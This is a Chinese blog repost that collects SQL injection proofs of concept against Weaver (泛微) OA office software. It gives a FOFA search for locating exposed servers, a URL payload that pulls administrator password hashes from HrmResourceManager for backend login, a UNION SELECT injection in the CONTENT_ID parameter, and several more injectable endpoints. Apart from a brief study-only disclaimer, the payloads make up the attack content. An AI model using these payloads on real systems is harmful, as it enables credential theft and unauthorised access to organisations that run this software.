泛微OA-SQL注入漏洞
生活随笔
收集整理的這篇文章主要介紹了
泛微OA-SQL注入漏洞
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
2021年進入網絡安全行業,作為網絡安全的小白,分享一些自學基礎教程給大家。希望在自己能體系化的總結自己已有的知識的同時,能對各位博友有所幫助。文章內容比較基礎,都是參考了很多大神的文章,各位不喜勿噴,謝謝!如果文章對您有幫助,將是我創作的最大動力!
工作中遇到的漏洞,記錄一下,本文僅作學習之用,請勿進行網絡犯罪,遵守《網絡安全法》等相關法律法規。
漏洞描述
泛微OA不同版本都存在SQL注入漏洞
FOFA
app=“泛微-協同辦公OA”
漏洞復現
1、泛微OA V8 SQL注入漏洞
POC
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager返回了數據庫第一條記錄的值
通過解密后,可以登錄后臺(漏洞原理可參考附錄文章)
2、泛微OA某版本的SQL注入漏洞(核實中)
POC
http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user3、后臺SQL注入
使用測試賬戶登錄,然后訪問
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=其中的CONTENT_ID參數能夠注射SQL語句。
http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=管理員情況下的注入:
http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1普通用戶注入:
http://xx.cn//cowork/CoworkLogView.jsp?id=151普通用戶注入地址:
http://xx.cn/system/basedata/basedata_role.jsp?roleid=32普通用戶注入地址:
http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3繼續收集中,未完待續…
參考文章
泛微OA V8 SQL注入漏洞
總結
以上是生活随笔為你收集整理的泛微OA-SQL注入漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 前端学习(1735):前端系列javas
- 下一篇: bbsmax mysql_mysql 常